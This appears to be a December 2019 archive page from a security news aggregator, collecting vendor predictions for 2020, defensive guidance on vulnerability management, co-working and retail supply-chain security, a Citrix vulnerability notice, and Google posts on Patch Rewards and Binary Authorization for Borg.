Monthly Archives: December 2019

Cyber Attacks are the Norm

By Babur Nawaz Khan, Product Marketing, A10 Networks

As we 2019, its time to have a look at the year 2020 and what it would have in store for enterprises.

Since we are in the business of securing our enterprise customers’ infrastructures, we keep a close eye on how the security and encryption landscape is changing so we can help our customers to stay one step ahead.

In 2019, ransomware made a comeback, worldwide mobile operators made aggressive strides in the transformation to 5G, and GDPR achieved its first full year of implementation and the industry saw some of the largest fines ever given for massive data breaches experienced by enterprises.

2020 will no doubt continue to bring a host of the not new, like the continued rash of DDoS attacks on government entities and cloud and gaming services, to the new and emerging. Below are just a few of the trends we see coming next year.

Ransomware will increase globally through 2020
Ransomware attacks are gaining widespread popularity because they can now be launched even against smaller players. Even a small amount of data can be used to hold an entire organisation, city or even country for ransom. The trend of attacks levied against North American cities and city governments will only continue to grow.

We will see at least three new strains of ransomware types introduced:

  • Modular or multi-leveled/layered ransomware and malware attacks will become the norm as this evasion technique becomes more prevalent. Modular attacks use multiple trojans and viruses to start the attack before the actual malware or ransomware is eventually downloaded and launched 
  • 70% of all malware attacks will use encryption to evade security measures (encrypted malware attacks)
To no surprise, the cyber security skills gap will keep on widening. As a result, security teams will struggle with creating fool-proof policies and leveraging the full potential of their security investments

Slow Adoption of new Encryption Standards
Although TLS 1.3 was ratified by the Internet Engineering Taskforce in August of 2018, we won’t see widespread or mainstream adoption: less than 10% of websites worldwide will start using TLS 1.3. TLS 1.2 will remain relevant, and therefore will remain the leading TLS version in use globally since it has not been compromised yet, it supports PFS, and the industry is generally slow when it comes to adopting new standards. Conversely, Elliptical-curve cryptology (ECC) ciphers will see more than 80% adoption as older ciphers, such as RSA ciphers, are disappearing.

Decryption: It’s not a Choice Any Longer
TLS decryption will become mainstream as more attacks leverage encryption for infection and data breaches. Since decryption remains a compute-intensive process, firewall performance degradation will remain higher than 50% and most enterprises will continue to overpay for SSL decryption due to lack of skills within the security teams. To mitigate firewall performance challenges and lack of skilled staff, enterprises will have to adopt dedicated decryption solutions as a more efficient option as next-generation firewalls (NGFWs) continue to polish their on-board decryption capabilities

Cyber attacks are indeed the new normal. Each year brings new security threats, data breaches and operational challenges, ensuing that businesses, governments and consumers have to always be on their toes. 2020 won’t be any different, particularly with the transformation to 5G mobile networks and the dramatic rise in IoT, by both consumers and businesses. The potential for massive and widespread cyber threats expands exponentially.

Let’s hope that organisations, as well as security vendors, focus on better understanding the security needs of the industry, and invest in solutions and policies that would give them a better chance at defending against the ever-evolving cyber threat landscape.

Only Focused on Patching? You’re Not Doing Vulnerability Management

By Anthony Perridge, VP International, ThreatQuotient

When I speak to security professionals about vulnerability management, I find that there is still a lot of confusion in the market. Most people immediately think I’m referring to getting rid of the vulnerabilities in the hardware and software within their network, but vulnerability management encompasses a much broader scope.

Vulnerability management is not just vulnerability scanning, the technical task of scanning the network to get a full inventory of all software and hardware and precise versions and current vulnerabilities associated with each. Nor is it vulnerability assessment, a project with a defined start and end that includes vulnerability scanning and a report on vulnerabilities identified and recommendations for remediation. Vulnerability management is a holistic approach to vulnerabilities – an ongoing process to better manage your organisation’s vulnerabilities for the long run. This practice includes vulnerability assessment which, by definition, includes vulnerability scanning, but also other steps as described in the SANS white paper, Implementing a Vulnerability Management Process.

Just as the process of vulnerability management is broader than you might think, the definition of a vulnerability is as well. A vulnerability is the state of being exposed to the possibility of an attack. The technical vulnerabilities in your network are one component, but there is another important aspect that is often overlooked – the vulnerabilities specific to your company, industry and geography. You can’t only look internally at the state of your assets. You must also look externally at threat actors and the campaigns they are currently launching to get a more complete picture of your vulnerabilities and strengthen your security posture more effectively.

In The Art of War, Sun Tzu captured the value of this strategy well when he stated, “If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained you will also suffer defeat. If you know neither the enemy nor yourself, you will succumb in every battle.”

Prioritise Patching Based on the Threat
As stated above, with respect to vulnerability management, most security organisations tend to focus on patching but because they don’t have the resources to patch everything quickly, they need to figure out what to patch first. To do this security teams typically take a thumbnail approach – they start with critical assets, the servers where their crown jewels are located, and work down to less critical assets. While a good starting point, their prioritisation decisions are based only on internal information. As Sun Tzu points out, knowing yourself but not the enemy will yield some victories but also defeats.

Having a platform that serves as a central repository allows you to aggregate internal threat and event data with external threat feeds and normalise that data so that it is in a usable format. By augmenting and enriching information from inside your environment with external threat intelligence about indicators, adversaries and their methods, you can map current attacks targeting your company, industry and geography to vulnerabilities in your assets. Intelligence about a campaign that presents an immediate and actual threat to your organisation leads to a more accurate assessment of priorities and may cause you to change your current patch plan to prioritise those systems that could be attacked at that moment. The result is intelligence-driven patch management that hardens your processes to thwart the attack


Bridge the Visibility Gap
Unfortunately, the reality is that not every company has 100% visibility into their assets and vulnerabilities, so mapping external threat data to internal indicators to hone a patch plan sometimes has limited value. However, there is still tremendous value in gathering information from global threat feeds and other external intelligence sources to determine if your business is under a specific attack. The MITRE ATT&CK framework is one such source. It dives deep into adversaries and their methodologies so security analysts can use that information to their advantage.

Bringing MITRE ATT&CK data into your repository allows you to start from a higher vantage point with information on adversaries and associated tactics, techniques and procedures. You can take a proactive approach, beginning with your organisation’s risk profile, mapping those risks to specific adversaries and their tactics, drilling down to techniques those adversaries are using and then investigating if these techniques could be successful or if related data have been identified in the environment. For example, you may be concerned with APT28 and can quickly answer questions including: What techniques do they apply? Have I seen potential indicators of compromise or possible related system events in my organisation? Are my endpoint technologies detecting those techniques? With answers to questions like these you can discover real threats, determine specific actions to harden your network and processes, and mitigate risk to your business.

A holistic approach to vulnerability management, that includes knowing yourself and your enemy, allows you to go beyond patching. It provides awareness and intelligence to effectively and efficiently mitigate your organisation’s risk and position your team to address other high-value activities – like detecting, containing and remediating actual attacks, and even anticipating potential threats.

Lessons Learned: A Decade of Digital Parenting

digital parenting

Give yourself a high-five, parents. Pour yourself a cup of coffee or your favorite celebratory drink and sip it slow — real slow. Savor the wins. Let go of the misses. Appreciate the lessons learned. You’ve come a long way in the last decade of raising digital kids, and not all of it has been easy.

As we head into 2020, we’re tossing parenting resolutions (hey, it’s a victory to make it through a week let alone a year!). Instead, we’re looking back over the digital terrain we’ve traveled together and lessons learned. Need a refresher? Here’s a glimpse of how technology has impacted the family over the past decade.

In the last decade

• Smartphone, social, gaming growth. Social media and gaming platforms have exploded to usage and influence levels no one could have imagined. Smartphone ownership has increased and as of 2019: 81% of adults own a smartphone and 72% use social media, 53% of kids own a smartphone by the age of 11, and 84 % of teenagers have phones.

• Video platform growth. Video platforms like YouTube have become the go-to for teens and tweens who spend nearly three hours a day watching videos online.

• Streaming news. Smartphones have made it possible for all of us to carry (and stream) the world in our pockets. In 2018, for the first time, social media sites surpassed print newspapers as a news source for Americans.

• Dating apps dominate. We’re hooking up, dating, and marrying using apps. A Stanford study found that “heterosexual couples are more likely to meet a romantic partner online than through personal contacts and connections.”

• The rise of the Influencer. Internet influencers and celebrities have reached epic levels of fame, wealth, and reach, creating an entire industry of vloggers, gamers, micro and niche-influencers, and others who have become “instafamous.”

• Lexicon changes. Every day, technology is adding terms to our lexicon that didn’t exist a decade ago such as selfie, OMG, streaming, bae, fake news, the cloud, wearables, finsta, influencers, emojis, tracking apps, catfish, digital shaming, screen time, cryptojacking, FOMO, and hashtag, along with hundreds of others.

What we’ve learned (often the hard way)

Most people, if polled, would say technology has improved daily life in incalculable ways. But ask a parent of a child between five and 18 the same question, and the response may not be as enthusiastic. Here are some lessons we’ve learned the hard way.

Connection brings risk. We’ve learned that with unprecedented connection comes equally unprecedented risk. Everyday devices plug our kids directly into the potential for cyberbullying, sexting, inappropriate content, and mental health issues.  Over the past decade, parents, schools, and leaders have worked to address these risks head-on but we have a long way to go in changing the online space into an emotionally safe and healthy place.

Tech addiction isn’t a myth.  To curb the negative impact of increased tech use, we’ve learned ways to balance and limit screen time, unplug, and digitally detox. Most importantly, it’s been confirmed that technology addiction is a medical condition that’s impacting people and families in very painful ways.

The internet remembers. We’ve witnessed the very public consequences of bad digital choices. Kids and adults have wrecked scholarships, reputations, and careers due to careless words or content shared online. Because of these cases, we’re learning — though never fast enough — to think twice about the behaviors and words we share.

We’re equipping vs. protecting. We’ve gone from monitoring our kids aggressively and freaking out over headlines to realizing that we can’t put the internet in a bottle and follow our kids 24/7. We’ve learned that relevant, consistent conversation, adding an extra layer of protection with security software, and taking the time to understand (not just monitor) the ways our kids use new apps, is the best way to equip them for digital life.

The parent-child relationship is #1. When it comes to raising savvy digital kids and keeping them safe, there’s not a monitoring plan in existence that rivals a strong parent-child relationship. If you’ve earned your child’s heart, mind, and respect, you have his or her attention and can equip them daily to make wise choices online.

The dark web is . . . unimaginably dark. The underbelly of the internet — the encrypted, anonymous terrain known as the Dark Web — has moved from covert to mainstream exposure. We’ve learned the hard way the degree of sophistication with which criminals engage in pornography, human trafficking, drug and weapon sales, and stolen data. With more knowledge, the public is taking more precautions especially when it comes to malware, phishing scams, and virus attacks launched through popular public channels.

There’s a lot of good going on. As much negative as we’ve seen and experienced online over the past decade, we’ve also learned that its power can be used equally to amplify the best of humanity. Social media has sparked social movements, helped first responders and brought strangers together in times of tragedy like no other medium in history.

Privacy is (finally) king. Ten years ago, we clicked on every link that came our way and wanted to share every juicy detail about our personal lives. We became publishers and public figures overnight and readily gave away priceless chunks of our privacy. The evolution and onslaught of data breaches, data mining, and malicious scams have educated us to safeguard our data and privacy like gold.

We’ve become content curators. The onslaught of fake news, photo apps, and filter bubbles have left our heads spinning and our allegiances confused. In the process, we’ve learned to be more discerning with the content we consume and share. While we’re not there yet, our collective digital literacy is improving as our understanding of various types of content grows.

Parents have become digital ninjas. The parenting tasks of monitoring, tracking, and keeping up with kids online have gone from daunting to doable for most parents. With the emotional issues now connected to social media, most parents don’t have the option of sitting on the sidelines and have learned to track their kids better than the FBI.

This is us

We’ve learned that for better or worse, this wired life is us. There’s no going back. Where once there may have been doubt a decade ago, today it’s clear we’re connected forever. The internet has become so deep-seated in our culture and homes that unplugging completely for most of us is no longer an option without severe financial (and emotional) consequences. The task ahead for this new decade? To continue working together to diminish the ugly side of technology — the bullying, the cruelty, the crime — and make the internet a safe, fun experience for everyone.

The post Lessons Learned: A Decade of Digital Parenting appeared first on McAfee Blogs.

Cybersecurity And Privacy for a Co-Working Space

The way we work and the spaces we work in have evolved considerably in the last fifty years. Corporate culture is nothing like what it used to be back in the 80’s and 90’s. Cabins and cubicles have given way to open offices. Many in the work-force today prefer to work remotely and maintain flexible hours. As such, hot-desking is common in many multi-national companies including those who have large office spaces. As the start-up culture evolved, there was a need for multiple small offices. This growing breed of self-employed professionals and start-up owners need other resources that are commonly required in the office environment like printers, shredders, Wi-Fi, meeting rooms, video-conferencing abilities etc . They also need a common place to meet people, network and exchange ideas because working solo could be monotonous at some time. Co-working has provided an all-in-one solution for the needs of such individuals and small groups of people by providing a common space where equipment and utilities could be shared between businesses who rent the space. Co-working spaces have thus become very popular across the world and especially in cities where real-estate is very expensive. According to statistics the number of co-working spaces has increase by 205% between 2014 and 2018

In any business however, security is paramount. Corporate espionage is very much a reality for small businesses that are very often the breeding ground for great ideas and innovations. Co-working spaces provide a melting pot for all kinds of unrelated people some of who cannot really be trusted. Thus it is necessary that when sharing space, equipment and utilities, users do not unknowingly end up sharing information and trade secrets. Ensuring data privacy and cyber security in a shared office can be very difficult but may be achieved by laying down the ground rules and ensuring that everyone follows it. Following are some of the security best practices for a co-working space.

  1. Ensuring network Security: While shared Wi-Fi access is probably one of the most popular and over utilized services provided by a co-working space, it is also the most vulnerable from a cyber security perspective. Following are some of the practices that would ensure secure access of Wi-Fi networks for all users.
    1. Having a dedicated administrator who would ensure that networks are set up correctly and securely. This person can also liaise with users to ensure that they are following the guidelines
    2. Setting up strong passwords for every network and ensuring that all passwords are changed frequently. This would also prevent old or previous members from accessing the network.
    3. Setting up individual networks and access pages for every business that is using the space including a separate network for guests.

 

  1. Securing smart devices: IoT has enabled intelligence in every device like TV, refrigerators, coffee machines and printers. A co-working space may be home to many such devices which are connected to the network. Tampering with any of these devices can allow people to access the Wi-Fi network or vice-versa. Therefore it is necessary to secure these devices by ensuring that their hardware is tamperproof and firmware is continuously updated. All devices that can connect to the network including laptops and phones should be password protected and should not be left around unlocked and/or unattended.

 

  1. Blocking websites: It is best to block potentially malicious websites which are not likely to do anyone any good. Corporate offices have always taken this step to prevent unwanted traffic and ensure network and data security. There is no reason why co-working spaces cannot offer this as a service.

 

  1. Vetting users: Co-working spaces may do a minimum background check on users to ensure that they fit-in with the business culture of the space and would not disrupt the normal functioning of the users in any way.

 

  1. Physical monitoring: Physical monitoring using cameras can ensure that users do not try to steal any data or equipment that does not belong to them. Providing physical access cards, logging in and out time of users and installing cameras can contribute to the overall security system of the space.

 

While these guidelines are general they should be useful to both the co-working space operators and users and would provide an idea on what to look out for and how to secure their private data and intellectual property.

 

 

The post Cybersecurity And Privacy for a Co-Working Space appeared first on CyberDB.

ACSC aware of critical vulnerability in Citrix Application Delivery Controller and Citrix Gateway

The Australian Signals Directorate’s Australian Cyber Security Centre (ACSC) is aware of a critical vulnerability that exists in the Citrix Application Delivery Controller (ADC) (formerly known as NetScaler ADC) and Citrix Gateway (formerly known as NetScaler Gateway). The vulnerability, known as CVE-2019-19781, was initially disclosed on 17 December 2019 and could allow an unauthenticated attacker to perform arbitrary code execution on an organisation’s local network.

12 days of Christmas Security Predictions: What lies ahead in 2020

Marked by a shortage of cyber security talent and attackers willing to exploit any vulnerability to achieve their aims, this year emphasised the need for organisations to invest in security and understand their risk posture. With the number of vendors in the cyber security market rapidly growing, rising standard for managing identities and access, and organisations investing more in security tools, 2020 will be a transformational year for the sector.

According to Rob Norris, VP Head of Enterprise & Cyber Security EMEIA at Fujitsu: “We anticipate that 2020 will be a positive year for security, and encourage public and private sector to work together to bring more talent to the sector and raise the industry standards. As the threat landscape continues to expand with phishing and ransomware still popular, so will the security tools, leaving organisations with a variety of solutions. Next year will also be marked by a rush to create an Artificial Intelligence silver-bullet for cyber security and a move from old-fashioned password management practices to password-less technologies.”

“As cyber criminals continue to find new ways to strike, we’ll be working hard to help our customers across the world to prepare their people, processes and technology to deal with these threats. One thing to always keep in mind is that technology alone cannot stop a breach - this requires a cultural shift to educate employees across organisations about data and security governance. After all, people are always at the front line of a cyber-attack.”

What will 2020 bring with Cybersecurity?

In light of this, Rob Norris shares his “12 Days of Christmas” security predictions for the coming year.

1. A United front for Cyber Security Talent Development
The shortage of cyber security talent will only get worse in 2020 - if we allow it to.

The scarce talent pool of cyber security specialists has become a real problem with various reports estimating a global shortage of 3.5 million unfulfilled positions by 2021. New approaches to talent creation need to be considered.

The government, academia, law enforcement and businesses all have a part to play in talent identification and development and will need to work collaboratively to provide different pathways for students who may not ordinarily be suited to the traditional education route. Institutions offering new cyber security courses for technically gifted individuals are a great starting point, but more will need to be done in 2020 if the shortage is to be reduced.

2. Cloud Adoption Expands the Unknown Threat Landscape 
It will take time for organisations to understand their risk posture as the adoption of cloud services grows.

While the transition to cloud-based services will provide many operational, business and commercial benefits to organisations, there will be many CISO’s working to understand the risks to their business with new data flows, data storage and new services. Traditional networks, in particular, boundaries and control of services are typically very well understood while the velocity and momentum of cloud adoption services leaves CISO’s with unanswered questions. Valid concerns remain around container security, cloud storage, cloud sharing applications, identity theft and vulnerabilities yet to be understood, or exposed.

3. The Brexit Effect 
Brexit will have far-reaching cyber security implications for many organisations, in many countries.

The UK and European markets are suffering from uncertainty around the UK’s departure from the European Union, which will affect the adoption of cyber security services, as organisations will be reticent to spend until the impact of Brexit is fully understood.

The implications of data residency legislation, hosting, corporation tax, EU-UK security collaboration and information sharing are all questions that will need to be answered in 2020 post-Brexit. There is a long-standing collaborative relationship between the UK and its EU counterparts including European Certs and Europol and whilst the dynamics of those working relationships should continue, CISO’s and senior security personnel will be watching closely to observe the real impact.

4. SOAR Revolution 
Security Orchestration, Automation and Response (SOAR) is a real game-changer for cyber security and early adopters will see the benefits in 2020 as the threat landscape continues to expand.

Threat intelligence is a domain that has taken a while for organisations to understand in terms of terminology and real business benefits. SOAR is another domain that will take time to be understood and adopted, but the business benefits are also tangible. At a granular level, the correct adoption of SOAR will help organisations map, understand and improve their business processes. By making correct use of their technology stack and associated API’s early adopters will get faster and enhanced reporting and will improve their security posture through the reduction of the Mean Time To Respond (MTTR) to threats that could impact their reputation, operations and bottom-line.

5. Further Market Fragmentation will Frustrate CISOs 
The number of vendors in the cyber security market has been rapidly growing and that will continue in 2020, but this is leading to confusion for organisations.

The cyber security market is an increasingly saturated one, often at the frustration of CISO’s who are frequently asked to evaluate new products. Providers that can offer a combined set of cyber security services that deliver clear business outcomes will gain traction as they can offer benefits over the use of disparate security technologies such as a reduction in contract management, discount provisioned across services, single point of contacts and reduction in services and technologies to manage.

Providers that continue to acquire security technologies to enhance their stack such as Endpoint Detection and Response (EDR) or technology analytics, will be best positioned to provide the full Managed Detection and Response (MDR) services that organisations need.

6. Artificial Intelligence (AI) will need Real Security 
2020 will see a rise in the use of adversarial attacks to exploit vulnerabilities in AI systems.

There is a rush to create an AI silver-bullet for cyber security however, there is currently a lack of focus on security for AI. It is likely we will see a shift towards this research area as “adversarial” approaches to neural networks could potentially divulge partial or complete data points that the model was trained on. It is also possible to extract parts of a model leading to intellectual property theft as well as the ability to craft “adversarial” AI which can manipulate the intended model. Currently, it is hard to detect and remediate these attacks.

There will need to be more focus on explainable AI, which would allow for response and remediation on what are currently black-box models.

7. Organisations will need to Understand how to make better use of Security Tools and Controls at their Disposal 
Customers will need to take better advantage of the security measures that they already have available. 

The well-established cloud platforms already contain many integrated security features but organisations are failing to take advantage of these features, partly because they do not know about them. A greater understanding of these features will allow organisations to make smarter investment decisions and we expect to see a growing demand for advice and services that allow organisations to optimally configure and monitor those technologies to ensure they have minimal risk and exposure to threats.

Fujitsu predicted last year that securing multi-cloud environments will be key going forward and organisations continue to need to find a balance of native and third-party tools to drive the right solution for their objectives.

8. Do you WannaCry again? 
The end of support for Windows Server 2008 and Windows 7 will open the door for well-prepared attackers.

January 2020 sees the official end of support life for all variants of Windows Server 2008 and Windows 7, which share elements of the same code base. This means that both end-user devices and data center servers will be equally vulnerable to the same exploits and opens the possibility that organisations could be susceptible to attacks that cause large outages.

In 2017, Wannacry surfaced and caused some well-publicised outages including well-known organisations from across the healthcare, manufacturing, logistics and aerospace industries. Microsoft had released patches two months before and recommended using a later version of the impacted components. We also learned in 2017, via Edward Snowden, that nation-states have built up an armoury of previously undisclosed exploits. These exploits are documented to target the majority of publicly available Operating Systems and so it stands to reason that cyber criminals could have also built a war chest of tools which will surface once the end of vendor support has passed for these Operating systems.

9. Rising the Standard for Managing Identities and Access
Federated Authentication, Single Sign-On and Adaptive Multi-Factor will become standard, if not required, practices in 2020.

2020 will see organisations continuing their adoption of hybrid and multi-cloud infrastructures and a ‘cloud-first’ attitude for applications. This creates the challenge of managing the expanding bundle of associated identities and credentials across the organisation.

Identities and associated credentials are the key attack vector in a data breach - they are ‘keys to the kingdom’. Without sufficient controls, especially for those with privileged rights, it is becoming increasingly difficult for organisations to securely manage identities and mitigate the risk of a data breach. Capabilities such as Federation Authentication, Single Sign-On and Adaptive Multi-Factor address the challenge of balance between security and usability, and we see this becoming standard, if not required, practice in 2020.

10. Extortion Phishing on the Rise 
Taboo lures enhanced phishing and social engineering techniques will prey on user privacy.

We are seeing an increase in a form of phishing that would have a recipient believe their potentially embarrassing web browsing and private activity has been observed with spyware and will be made public unless a large ransom is paid.

Since their widespread emergence last year, the techniques used by these extortionists to evade filters continue to develop. Simple text-only emails from single addresses now come from ‘burnable’ single-use domains. Glyphs from the Cyrillic, Greek, Armenian and extended Latin alphabets are being used to substitute letters in the email to bypass keyword filters and Bitcoin wallets are rotated often and used to associate a recipient with a payment.

The psychological tricks used in the wording of these emails will develop and likely aid their continued success.

11. Passwords become a Thing of the Past 
We will see increasing adoption of end-to-end password-less access, especially in scenarios where Privileged Access Management (PAM) is required.

Next year we will see a move from old-fashioned password management practices to password-less technologies. The increasing number of cases where privileged credentials and passwords are required, but are painful to manage in secure and cost effective, way will drive this shift. Passwords are easy to forget and the increasing complexity requirements placed upon users increases the chances of passwords having to be written down – which is self-defeating. Biometric technologies and ephemeral certificates will provide a more secure and user-friendly way to manage credentials and ensure assets and data are kept secure.

12. Ransomware not so Random
As more organisations employ negotiators to work with threat actors, ransomware is likely to decrease next year.

In 2019, we observed a shift in the way certain ransomware ransom notes were constructed. Traditionally, ransomware notes are generic template text informing the victim that their files are encrypted and that they must pay a set amount of Bitcoin in order to have their files unencrypted.

When threat actors successfully deploy ransomware network-wide and achieve other deployment objectives, they inform their victims their files are encrypted. Crucially, however, they do not reveal the price they demand for their decryption. Instead, threat actors seek to open a dialogue with the victim to discuss a price. This change has seen organisations employ negotiators to work with threat actors on managing and, hopefully, reducing the demand and we expect this to continue in 2020.

How the Cyber Grinch Stole Christmas: Managing Retailer Supply Chain Cyber Risk

Cyber threats are always a prominent risk to businesses, especially those operating with high quantities of customer information in the retail space, with over 50% of global retailers were breached last year.  BitSight VP, Jake Olcott, has written guidance for retailers, on how to manage their supply-chain cyber risk to help prevent the 'Cyber Grinch' from not just stealing Christmas, but throughout the year, with four simple steps.


Cyber risk in retail is not a new concept. Retail is one of the most targeted industries when it comes to cyber-attacks. In fact, over 50% of global retailers were breached in the last year. Given the sensitive customer data these organizations often possess — like credit card information and personally identifiable information (PII) – it’s not surprising that attackers have been capitalizing on the industry for decades.

The Christmas shopping season can increase retailers’ cyber risk, with bad actors looking to take advantage of the massive surge of in-store and online shoppers that comes with it. What is important for retailers to keep in mind is that it’s not only their own network they have to worry about when it comes to mitigating cyber risk, but their entire supply chain ecosystem – from shipping distributors and production partners to point-of-sale technologies and beyond.

Take for example the infamous 2017 NotPetya attack that targeted large electric utilities, but actually ended up stalling operations for many retailers as a result. This nation-state attack had a snowball effect, wreaking havoc on shipping companies like FedEx and Maersk who are responsible for delivering many retail orders. FedEx operations were reduced to manual processes for pick-up, sort and delivery, and Maersk saw infections in part of its corporate network that paralyzed some systems in its container business and prevented retail customers from booking ships and receiving quotes.

For retailers, a cyber disruption in the supply chain can fundamentally disrupt operations, causing catastrophic harm to brand reputation, financial performance and regulatory repercussions – and the stakes are even higher during the make-or-break holiday sales period.

Here are some important steps they can take now to mitigate supply chain cyber risk this holiday season and beyond.
 
Step 1: Inventory your Supply Chain
A business today relies on an average of 89 vendors a week that have access to their network in order to perform various crucial business. As outsourcing and cloud adoption continue to rise across retail organizations, it is critical that they keep an up-to-date catalogue of every third party and service provider in the digital (or brick-and-mortar) supply chain and their network access points. These supply chain ecosystems can be massive, but previous examples have taught us that security issues impacting any individual organization can potentially disrupt the broader system.

An inventory of vendors and the systems they have access to allows security teams to keep track of all possible paths a cybercriminal may exploit and can help them better identify vulnerabilities and improve response time in the event of an incident.

Step 2: Take control of your Third-Party Accounts
Once you have a firm grasp of the supply chain, a critical focus should be to identify and manage any network accounts held by these organizations. While some suppliers may need access to complete their daily tasks, this shouldn’t mean handing them a full set of keys to the kingdom on their terms.

Retailers should ensure each vendor has an email account and credentials affiliated and managed by the retailer – not by the supplier organization and certainly not the user themselves. By taking this step, the retailer can ensure they are the first point of notification if and when an incident occurs and are in full control over the remediation process.


Step 3: Assess your Suppliers’ Security Posture
Retail security teams often conduct regular internal audits to evaluate their own security posture but fail to do so effectively when it comes to their supply chain relationships.

While a supplier’s security posture doesn’t necessarily indicate that their products and services contain security flaws, in the cyber world, where there’s smoke, there’s eventually fire. Poor security performance can be indicative of bad habits that could lead to increased vulnerability and risk exposure.

Having clear visibility into supplier security performance can help retailers quickly pinpoint security vulnerabilities and cyber incidents, while significantly speeding up communication and action to address the security concern at hand.

Step 4: Continuously Monitor for Changes
Third-party security performance assessment should not be treated as a one-and-done item on the supply chain management checklist.

The cyber threat landscape is volatile and ever-evolving, with new vulnerabilities and attack vectors cropping up virtually every day. That means retailers need solutions and strategies in place that provide a real-time, continuous and measurable pulse check of supplier security posture to ensure they are on top of potential threats before they impact the business and its customers.

Just as retailers track billions of packages and shipments in real-time to ensure there are no mistakes or bumps in the road, their vendor risk management program should be treated with the same due care.

This holiday season and beyond, it is critical that retailers invest in supply chain security management to reduce the risk of data breaches, slowdowns, and outages – and the costs and reputational damage that come along with them. After all, retailers are only as secure as their weakest third-party.

NIST Study Evaluates Effects of Race, Age, Sex on Face Recognition Software

How accurately do face recognition software tools identify people of varied sex, age and racial background? According to a new study by the National Institute of Standards and Technology (NIST), the answer depends on the algorithm at the heart of the system, the application that uses it and the data it’s fed — but the majority of face recognition algorithms exhibit demographic differentials. A differential means that an algorithm’s ability to match two images of the same person varies from one demographic group to another. Results captured in the report, Face Recognition Vendor Test (FRVT)

NICE Webinar: Shopping Safely Online and the Work of Cybersecurity Awareness and Behavior Change

The PowerPoint slides used during this webinar can be downloaded here. Speakers: Lance Spitzner Director SANS Security Awareness Synopsis: ‘Tis the season for online holiday shopping . . . but you Better Watch Out for online scams or the CyberGrinch will steal your holiday joy. Aside from making consumers aware of safe online practices, performing the work of cybersecurity awareness training is an important part of any organization’s information security program. This webinar will provide timely tips for staying safe online during the holiday season and will make the case for inclusion in the

Announcing updates to our Patch Rewards program in 2020


At Google, we strive to make the internet safer and that includes recognizing and rewarding security improvements that are vital to the health of the entire web. In 2020, we are building on this commitment by launching a new iteration of our Patch Rewards program for third-party open source projects.

Over the last six years, we have rewarded open source projects for security improvements after they have been implemented. While this has led to overall improved security, we want to take this one step further.

Introducing upfront financial help
Starting on January 1, 2020, we’re not only going to reward proactive security improvements after the work is completed, but we will also complement the program with upfront financial support to provide an additional resource for open source developers to prioritize security work. For example, if you are a small open source project and you want to improve security, but don’t have the necessary resources, this new reward can help you acquire additional development capacity.

We will start off with two support levels :
  • Small ($5,000): Meant to motivate and reward a project for fixing a small number of security issues. Examples: improvements to privilege separation or sandboxing, cleanup of integer artimetrics, or more generally fixing vulnerabilities identified in open source software by bug bounty programs such as EU-FOSSA 2 (see ‘Qualifying submissions’ here for more examples).
  • Large ($30,000): Meant to incentivize a larger project to invest heavily in security, e.g. providing support to find additional developers, or implement a significant new security feature (e.g. new compiler mitigations).
Nomination process

Anyone can nominate an open source project for support by filling out http://goo.gle/patchz-nomination. Our Patch Reward Panel will review submissions on a monthly basis and select a number of projects that meet the program criteria. The panel will let submitors know if a project has been chosen and will start working with the project maintainers directly.

Projects in scope

Any open source project can be nominated for support. When selecting projects, the panel will put an emphasis on projects that either are vital to the health of the Internet or are end-user projects with a large user base.

What do we expect in return?

We expect to see security improvements to open source software. Ideally, the project can provide us
with a short blurb or pointers to some of the completed work that was possible because of our support. We don’t want to add bureaucracy, but would like to measure the success of the program.
What about the existing Patch Rewards program?
This is an addition to the existing program, the current Patch Rewards program will continue as it stands today.

NIST Scientists and Engineers Pitch Innovations to Venture Capitalists

The Technology Partnerships Office (TPO) at the National Institute of Standards and Technology (NIST), on December 02, 2019, brought to life an event that merged the innovations of federal laboratories with commercial industry, forming partnerships to grow the nation’s economy. The Technology Maturation Accelerator Program (TMAP) was designed as a challenge for NIST scientists and engineers to bring to the table their most promising research projects that may have the largest commercial impact on society. Establishing the first ever TMAP at NIST fell in line with the President’s Management

Protecting programmatic access to user data with Binary Authorization for Borg


At Google, the safety of user data is our paramount concern and we strive to protect it comprehensively. That includes protection from insider risk, which is the possible risk that employees could use their organizational knowledge or access to perform malicious acts. Insider risk also covers the scenario where an attacker has compromised the credentials of someone at Google to facilitate their attack. There are times when it’s necessary for our services and personnel to access user data as part of fulfilling our contractual obligations to you: as part of their role, such as user support; and programmatically, as part of a service. Today, we’re releasing a whitepaper, “Binary Authorization for Borg: how Google verifies code provenance and implements code identity,” that explains one of the mechanisms we use to protect user data from insider risks on Google's cluster management system Borg.

Binary Authorization for Borg is a deploy-time enforcement check

Binary Authorization for Borg, or BAB, is an internal deploy-time enforcement check that reduces insider risk by ensuring that production software and configuration deployed at Google is properly reviewed and authorized, especially when that code has the ability to access user data. BAB ensures that code and configuration deployments meet certain standards prior to being deployed. BAB includes both a deploy-time enforcement service to prevent unauthorized jobs from starting, and an audit trail of the code and configuration used in BAB-enabled jobs.

BAB ensures that Google's official software supply chain process is followed. First, a code change is reviewed and approved before being checked into Google's central source code repository. Next, the code is verifiably built and packaged using Google's central build system. This is done by creating the build in a secure sandbox and recording the package's origin in metadata for verification purposes. Finally, the job is deployed to Borg, with a job-specific identity. BAB rejects any package that lacks proper metadata, that did not follow the proper supply chain process, or that otherwise does not match the identity’s predefined policy.

Binary Authorization for Borg allows for several kinds of security checks

BAB can be used for many kinds of deploy-time security checks. Some examples include:
  • Is the binary built from checked in code?
  • Is the binary built verifiably?
  • Is the binary built from tested code?
  • Is the binary built from code intended to be used in the deployment?
After deployment, a job is continuously verified for its lifetime, to check that jobs that were started (and any that may still be running) conform to updates to their policies.

Binary Authorization for Borg provides other security benefits
Though the primary purpose of BAB is to limit the ability of a potentially malicious insider to run an unauthorized job that could access user data, BAB has other security benefits. BAB provides robust code identity for jobs in Google’s infrastructure, tying a job’s identity to specific code, and ensuring that only the specified code can be used to exercise the job identity’s privileges. This allows for a transition from a job identity—trusting an identity and any of its privileged human users transitively—to a code identity—trusting a specific piece of reviewed code to have specific semantics and which cannot be modified without an approval process.

BAB also dictates a common language for data protection, so that multiple teams can understand and meet the same requirements. Certain processes, such as those for financial reporting, need to meet certain change management requirements for compliance purposes. Using BAB, these checks can be automated, saving time and increasing the scope of coverage.

Binary Authorization for Borg is part of the BeyondProd model
BAB is one of several technologies used at Google to mitigate insider risk, and one piece of how we secure containers and microservices in production. By using containerized systems and verifying their BAB requirements prior to deployment, our systems are easier to debug, more reliable, and have a clearer change management process. More details on how Google has adopted a cloud-native security model are available in another whitepaper we are releasing today, “BeyondProd: A new approach to cloud-native security.”

